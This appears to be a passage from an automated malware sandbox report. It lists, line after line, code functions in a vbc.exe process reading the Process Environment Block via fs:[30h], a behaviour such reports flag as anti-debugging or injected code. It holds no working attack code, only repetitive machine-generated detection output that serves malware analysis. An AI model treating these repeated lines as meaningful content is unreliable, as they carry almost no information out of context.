          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C60310 mov ecx, dword ptr fs:[00000030h]6_2_05C60310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4A2C3 mov eax, dword ptr fs:[00000030h]6_2_05C4A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4A2C3 mov eax, dword ptr fs:[00000030h]6_2_05C4A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4A2C3 mov eax, dword ptr fs:[00000030h]6_2_05C4A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4A2C3 mov eax, dword ptr fs:[00000030h]6_2_05C4A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4A2C3 mov eax, dword ptr fs:[00000030h]6_2_05C4A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D162D6 mov eax, dword ptr fs:[00000030h]6_2_05D162D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C502E1 mov eax, dword ptr fs:[00000030h]6_2_05C502E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C502E1 mov eax, dword ptr fs:[00000030h]6_2_05C502E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C502E1 mov eax, dword ptr fs:[00000030h]6_2_05C502E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7E284 mov eax, dword ptr fs:[00000030h]6_2_05C7E284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7E284 mov eax, dword ptr fs:[00000030h]6_2_05C7E284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC0283 mov eax, dword ptr fs:[00000030h]6_2_05CC0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC0283 mov eax, dword ptr fs:[00000030h]6_2_05CC0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC0283 mov eax, dword ptr fs:[00000030h]6_2_05CC0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C502A0 mov eax, dword ptr fs:[00000030h]6_2_05C502A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C502A0 mov eax, dword ptr fs:[00000030h]6_2_05C502A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD62A0 mov eax, dword ptr fs:[00000030h]6_2_05CD62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD62A0 mov ecx, dword ptr fs:[00000030h]6_2_05CD62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD62A0 mov eax, dword ptr fs:[00000030h]6_2_05CD62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD62A0 mov eax, dword ptr fs:[00000030h]6_2_05CD62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD62A0 mov eax, dword ptr fs:[00000030h]6_2_05CD62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD62A0 mov eax, dword ptr fs:[00000030h]6_2_05CD62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D1625D mov eax, dword ptr fs:[00000030h]6_2_05D1625D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC8243 mov eax, dword ptr fs:[00000030h]6_2_05CC8243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC8243 mov ecx, dword ptr fs:[00000030h]6_2_05CC8243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3A250 mov eax, dword ptr fs:[00000030h]6_2_05C3A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C46259 mov eax, dword ptr fs:[00000030h]6_2_05C46259
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CFA250 mov eax, dword ptr fs:[00000030h]6_2_05CFA250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CFA250 mov eax, dword ptr fs:[00000030h]6_2_05CFA250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C44260 mov eax, dword ptr fs:[00000030h]6_2_05C44260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C44260 mov eax, dword ptr fs:[00000030h]6_2_05C44260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C44260 mov eax, dword ptr fs:[00000030h]6_2_05C44260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3826B mov eax, dword ptr fs:[00000030h]6_2_05C3826B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0274 mov eax, dword ptr fs:[00000030h]6_2_05CF0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0274 mov eax, dword ptr fs:[00000030h]6_2_05CF0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0274 mov eax, dword ptr fs:[00000030h]6_2_05CF0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0274 mov eax, dword ptr fs:[00000030h]6_2_05CF0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0274 mov eax, dword ptr fs:[00000030h]6_2_05CF0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0274 mov eax, dword ptr fs:[00000030h]6_2_05CF0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0274 mov eax, dword ptr fs:[00000030h]6_2_05CF0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0274 mov eax, dword ptr fs:[00000030h]6_2_05CF0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0274 mov eax, dword ptr fs:[00000030h]6_2_05CF0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0274 mov eax, dword ptr fs:[00000030h]6_2_05CF0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0274 mov eax, dword ptr fs:[00000030h]6_2_05CF0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0274 mov eax, dword ptr fs:[00000030h]6_2_05CF0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3823B mov eax, dword ptr fs:[00000030h]6_2_05C3823B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6EDD3 mov eax, dword ptr fs:[00000030h]6_2_05C6EDD3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6EDD3 mov eax, dword ptr fs:[00000030h]6_2_05C6EDD3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC4DD7 mov eax, dword ptr fs:[00000030h]6_2_05CC4DD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC4DD7 mov eax, dword ptr fs:[00000030h]6_2_05CC4DD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4ADE0 mov eax, dword ptr fs:[00000030h]6_2_05C4ADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4ADE0 mov eax, dword ptr fs:[00000030h]6_2_05C4ADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4ADE0 mov eax, dword ptr fs:[00000030h]6_2_05C4ADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4ADE0 mov eax, dword ptr fs:[00000030h]6_2_05C4ADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4ADE0 mov eax, dword ptr fs:[00000030h]6_2_05C4ADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4ADE0 mov eax, dword ptr fs:[00000030h]6_2_05C4ADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C60DE1 mov eax, dword ptr fs:[00000030h]6_2_05C60DE1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3CDEA mov eax, dword ptr fs:[00000030h]6_2_05C3CDEA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3CDEA mov eax, dword ptr fs:[00000030h]6_2_05C3CDEA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C36DF6 mov eax, dword ptr fs:[00000030h]6_2_05C36DF6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6CDF0 mov eax, dword ptr fs:[00000030h]6_2_05C6CDF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6CDF0 mov ecx, dword ptr fs:[00000030h]6_2_05C6CDF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE0DF0 mov eax, dword ptr fs:[00000030h]6_2_05CE0DF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE0DF0 mov eax, dword ptr fs:[00000030h]6_2_05CE0DF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C76DA0 mov eax, dword ptr fs:[00000030h]6_2_05C76DA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7CDB1 mov ecx, dword ptr fs:[00000030h]6_2_05C7CDB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7CDB1 mov eax, dword ptr fs:[00000030h]6_2_05C7CDB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7CDB1 mov eax, dword ptr fs:[00000030h]6_2_05C7CDB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C68DBF mov eax, dword ptr fs:[00000030h]6_2_05C68DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C68DBF mov eax, dword ptr fs:[00000030h]6_2_05C68DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D14DAD mov eax, dword ptr fs:[00000030h]6_2_05D14DAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D08DAE mov eax, dword ptr fs:[00000030h]6_2_05D08DAE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D08DAE mov eax, dword ptr fs:[00000030h]6_2_05D08DAE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C40D59 mov eax, dword ptr fs:[00000030h]6_2_05C40D59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C40D59 mov eax, dword ptr fs:[00000030h]6_2_05C40D59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C40D59 mov eax, dword ptr fs:[00000030h]6_2_05C40D59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C48D59 mov eax, dword ptr fs:[00000030h]6_2_05C48D59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C48D59 mov eax, dword ptr fs:[00000030h]6_2_05C48D59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C48D59 mov eax, dword ptr fs:[00000030h]6_2_05C48D59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C48D59 mov eax, dword ptr fs:[00000030h]6_2_05C48D59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C48D59 mov eax, dword ptr fs:[00000030h]6_2_05C48D59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD8D6B mov eax, dword ptr fs:[00000030h]6_2_05CD8D6B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5AD00 mov eax, dword ptr fs:[00000030h]6_2_05C5AD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5AD00 mov eax, dword ptr fs:[00000030h]6_2_05C5AD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5AD00 mov eax, dword ptr fs:[00000030h]6_2_05C5AD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C36D10 mov eax, dword ptr fs:[00000030h]6_2_05C36D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C36D10 mov eax, dword ptr fs:[00000030h]6_2_05C36D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C36D10 mov eax, dword ptr fs:[00000030h]6_2_05C36D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C74D1D mov eax, dword ptr fs:[00000030h]6_2_05C74D1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF8D10 mov eax, dword ptr fs:[00000030h]6_2_05CF8D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF8D10 mov eax, dword ptr fs:[00000030h]6_2_05CF8D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D14D30 mov eax, dword ptr fs:[00000030h]6_2_05D14D30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC8D20 mov eax, dword ptr fs:[00000030h]6_2_05CC8D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3CCC8 mov eax, dword ptr fs:[00000030h]6_2_05C3CCC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C38CD0 mov eax, dword ptr fs:[00000030h]6_2_05C38CD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C72CF0 mov eax, dword ptr fs:[00000030h]6_2_05C72CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C72CF0 mov eax, dword ptr fs:[00000030h]6_2_05C72CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C72CF0 mov eax, dword ptr fs:[00000030h]6_2_05C72CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C72CF0 mov eax, dword ptr fs:[00000030h]6_2_05C72CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C38C8D mov eax, dword ptr fs:[00000030h]6_2_05C38C8D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBCCA0 mov ecx, dword ptr fs:[00000030h]6_2_05CBCCA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBCCA0 mov eax, dword ptr fs:[00000030h]6_2_05CBCCA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBCCA0 mov eax, dword ptr fs:[00000030h]6_2_05CBCCA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBCCA0 mov eax, dword ptr fs:[00000030h]6_2_05CBCCA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C68CB1 mov eax, dword ptr fs:[00000030h]6_2_05C68CB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C68CB1 mov eax, dword ptr fs:[00000030h]6_2_05C68CB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0CB5 mov eax, dword ptr fs:[00000030h]6_2_05CF0CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0CB5 mov eax, dword ptr fs:[00000030h]6_2_05CF0CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0CB5 mov eax, dword ptr fs:[00000030h]6_2_05CF0CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0CB5 mov eax, dword ptr fs:[00000030h]6_2_05CF0CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0CB5 mov eax, dword ptr fs:[00000030h]6_2_05CF0CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0CB5 mov eax, dword ptr fs:[00000030h]6_2_05CF0CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0CB5 mov eax, dword ptr fs:[00000030h]6_2_05CF0CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0CB5 mov eax, dword ptr fs:[00000030h]6_2_05CF0CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0CB5 mov eax, dword ptr fs:[00000030h]6_2_05CF0CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0CB5 mov eax, dword ptr fs:[00000030h]6_2_05CF0CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0CB5 mov eax, dword ptr fs:[00000030h]6_2_05CF0CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0CB5 mov eax, dword ptr fs:[00000030h]6_2_05CF0CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0CB5 mov eax, dword ptr fs:[00000030h]6_2_05CF0CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4AC50 mov eax, dword ptr fs:[00000030h]6_2_05C4AC50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4AC50 mov eax, dword ptr fs:[00000030h]6_2_05C4AC50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4AC50 mov eax, dword ptr fs:[00000030h]6_2_05C4AC50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4AC50 mov eax, dword ptr fs:[00000030h]6_2_05C4AC50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4AC50 mov eax, dword ptr fs:[00000030h]6_2_05C4AC50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4AC50 mov eax, dword ptr fs:[00000030h]6_2_05C4AC50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C46C50 mov eax, dword ptr fs:[00000030h]6_2_05C46C50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C46C50 mov eax, dword ptr fs:[00000030h]6_2_05C46C50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C46C50 mov eax, dword ptr fs:[00000030h]6_2_05C46C50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C74C59 mov eax, dword ptr fs:[00000030h]6_2_05C74C59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC4C0F mov eax, dword ptr fs:[00000030h]6_2_05CC4C0F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50C00 mov eax, dword ptr fs:[00000030h]6_2_05C50C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50C00 mov eax, dword ptr fs:[00000030h]6_2_05C50C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50C00 mov eax, dword ptr fs:[00000030h]6_2_05C50C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50C00 mov eax, dword ptr fs:[00000030h]6_2_05C50C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7CC00 mov eax, dword ptr fs:[00000030h]6_2_05C7CC00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3EC20 mov eax, dword ptr fs:[00000030h]6_2_05C3EC20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CDCC20 mov eax, dword ptr fs:[00000030h]6_2_05CDCC20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CDCC20 mov eax, dword ptr fs:[00000030h]6_2_05CDCC20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE4C34 mov eax, dword ptr fs:[00000030h]6_2_05CE4C34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE4C34 mov eax, dword ptr fs:[00000030h]6_2_05CE4C34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE4C34 mov eax, dword ptr fs:[00000030h]6_2_05CE4C34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE4C34 mov eax, dword ptr fs:[00000030h]6_2_05CE4C34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE4C34 mov eax, dword ptr fs:[00000030h]6_2_05CE4C34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE4C34 mov eax, dword ptr fs:[00000030h]6_2_05CE4C34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE4C34 mov ecx, dword ptr fs:[00000030h]6_2_05CE4C34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C42FC8 mov eax, dword ptr fs:[00000030h]6_2_05C42FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C42FC8 mov eax, dword ptr fs:[00000030h]6_2_05C42FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C42FC8 mov eax, dword ptr fs:[00000030h]6_2_05C42FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C42FC8 mov eax, dword ptr fs:[00000030h]6_2_05C42FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3EFD8 mov eax, dword ptr fs:[00000030h]6_2_05C3EFD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3EFD8 mov eax, dword ptr fs:[00000030h]6_2_05C3EFD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3EFD8 mov eax, dword ptr fs:[00000030h]6_2_05C3EFD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D14FE7 mov eax, dword ptr fs:[00000030h]6_2_05D14FE7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF6FF7 mov eax, dword ptr fs:[00000030h]6_2_05CF6FF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C80FF6 mov eax, dword ptr fs:[00000030h]6_2_05C80FF6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C80FF6 mov eax, dword ptr fs:[00000030h]6_2_05C80FF6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C80FF6 mov eax, dword ptr fs:[00000030h]6_2_05C80FF6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C80FF6 mov eax, dword ptr fs:[00000030h]6_2_05C80FF6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7CF80 mov eax, dword ptr fs:[00000030h]6_2_05C7CF80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C72F98 mov eax, dword ptr fs:[00000030h]6_2_05C72F98
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C72F98 mov eax, dword ptr fs:[00000030h]6_2_05C72F98
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC4F40 mov eax, dword ptr fs:[00000030h]6_2_05CC4F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC4F40 mov eax, dword ptr fs:[00000030h]6_2_05CC4F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC4F40 mov eax, dword ptr fs:[00000030h]6_2_05CC4F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC4F40 mov eax, dword ptr fs:[00000030h]6_2_05CC4F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE4F42 mov eax, dword ptr fs:[00000030h]6_2_05CE4F42
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3CF50 mov eax, dword ptr fs:[00000030h]6_2_05C3CF50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3CF50 mov eax, dword ptr fs:[00000030h]6_2_05C3CF50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3CF50 mov eax, dword ptr fs:[00000030h]6_2_05C3CF50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3CF50 mov eax, dword ptr fs:[00000030h]6_2_05C3CF50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3CF50 mov eax, dword ptr fs:[00000030h]6_2_05C3CF50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3CF50 mov eax, dword ptr fs:[00000030h]6_2_05C3CF50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7CF50 mov eax, dword ptr fs:[00000030h]6_2_05C7CF50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE0F50 mov eax, dword ptr fs:[00000030h]6_2_05CE0F50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE2F60 mov eax, dword ptr fs:[00000030h]6_2_05CE2F60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE2F60 mov eax, dword ptr fs:[00000030h]6_2_05CE2F60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6AF69 mov eax, dword ptr fs:[00000030h]6_2_05C6AF69
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6AF69 mov eax, dword ptr fs:[00000030h]6_2_05C6AF69
